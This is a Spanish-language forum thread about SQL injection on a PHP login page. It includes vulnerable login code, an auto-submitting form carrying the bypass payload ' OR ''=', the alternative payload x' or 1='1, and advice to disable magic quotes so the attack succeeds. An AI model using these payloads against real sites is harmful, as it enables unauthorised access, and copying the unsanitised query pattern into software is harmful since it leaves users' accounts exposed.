SQLi en login...

[Banti]

Tengo un problema yo otra vez....

Código [Seleccionar] Expandir

<?  include("../Connections/conn_ig.php");

echo $usuario = $HTTP_POST_VARS["usuario"];
echo $contrasena = $HTTP_POST_VARS["contrasena"];

$ssql = "SELECT * FROM usuarios WHERE nombre_usuario='$usuario' and clave_usuario='$contrasena'";

$rs = mysql_query($ssql,$cosa);
$row=mysql_fetch_array($rs);

if (mysql_num_rows($rs)!=0){



//usuario y contraseña válidos and tipo='admin'
//defino una sesion y guardo datos
session_start();
session_register("autentificado");
$_SESSION["autentificado"]= "SI"; 
//panel.php tiene el panel de control
header("Location: panel.php");
}

?>
Tengo este codigo que autentifica al usuario que se conecta a la pagina... Que creo que es vulnerable a SQL Injection.

Realizo este codigo:

Código [Seleccionar] Expandir

<body onload="document.forms[0].submit()">
<form action="http://www.pagina.com.ar/conectar.php" method="post">
<input type="text" Name="usuario" Value="admin">
<input type="text" Name="contrasena" Value="' OR ''='">
</form>
Pero no me funciona... Alguien me podria guiar?

[Darioxhcx]

mira esto...

http://www.webtaller.com/construccion/lenguajes/php/lessons/evitar_inyeccion_sql.php

capas te sirve.....

[WHK]

Intenta ponerle valores válidos en ves de nada, por ejemplo de password:
x' or 1='1
tienes la base de datos puesta verdad?
Verifica yambién que no tengas habilitado el magic quotes.

[Banti]

tienes la base de datos puesta verdad?

Sip, una 100% real.

Dario, lei un poco. Pero yo no veo ni una funcion malevola que me evite el SQLi.

Aun no entiendo que coños es magic quotes pero era esa cosita que te cambiba los caracteres "malvados" a uno no muy malvado no?

estuve viendo que cuando pongo el pass me lo recibe como:

Código [Seleccionar] Expandir

x\' or 1=\'1
Es por culpa de las magic quotes?

[WHK]

Así es, es problemas del magic quotes.

Si quieres practicar debes deshabilitarlo desde el php.ini

[Banti]

Ah, ok Gracias otra vez!